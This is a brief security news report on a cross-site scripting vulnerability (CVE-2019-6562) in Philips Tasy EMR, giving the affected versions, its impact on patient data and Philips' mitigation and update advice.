Philips has a mitigation plan to handle a cross-site scripting vulnerability in its Tasy EMR, according to a report with NCCIC.
Successful exploitation of this vulnerability, discovered by security researcher Rafael Honorato, could impact or compromise patient confidentiality and system integrity.
Netherlands-based Philips’ analysis has shown these issues, if fully exploited, may allow attackers of low skill in the customer site or on a VPN to provide unexpected input into the application, execute arbitrary code, alter the intended control flow of the system, and access sensitive information.
A clinical and administrative workflow-based information system, Tasy EMR Versions 3.02.1744 and prior suffer from the vulnerability.
In the vulnerability, the software incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page served to other users.
CVE-2019-6562 is the case number assigned to this vulnerability, which has a CVSS v3 base score of 4.1.
The product sees use mainly in the healthcare and public health sectors. It also sees action in Brazil and Mexico.
No known public exploits specifically target this vulnerability. This vulnerability is not exploitable remotely.
Users should follow the instructions in the product configuration manual and not provide Tasy EMR with access to the Internet without a VPN. Users are also advised to update to the most recent three released versions of the product, following the Tasy EMR release schedule. Users should upgrade service packs as soon as possible. Hosted solutions will be patched automatically. Users running the application on premise are always alerted via release notes on changes to the system.
Users with questions regarding Tasy EMR should follow the service procedure and open a service order to Philips.
Click on the Philips product security website for the latest security information for Philips products.